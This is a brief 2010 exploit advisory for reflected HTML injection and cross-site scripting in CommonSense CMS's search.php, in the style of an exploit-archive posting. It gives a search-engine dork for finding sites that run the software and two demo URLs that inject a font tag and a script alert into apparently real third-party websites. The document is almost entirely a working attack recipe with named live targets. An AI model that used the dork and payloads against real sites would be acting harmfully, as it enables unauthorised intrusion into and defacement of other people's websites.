===
# CommonSense CMS Cross Site Scripting Vulnerability
===###########
# Name: CommonSense CMS Cross Site Scripting Vulnerability
# Vendor: http://www.sensesites.com/
# Date: 2010-07-21
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
###########
[+] Dork: intext:"Powered by CommonSense CMS script"
###########
[+] HTML InjecTion Vulnerability:
[+] Demo: http://awaywithwords.info/search.php?q=%3Cfont%20color=Blue%20size=15%3EHTML/XSS%20InjecTion%3C/font%3E
###########
[+] XSS InjecTion Vulnerability:
[+] Demo: http://www.bestweightlossadvice.com/search.php?q=<script>alert(/XroGuE/);</script>
###########
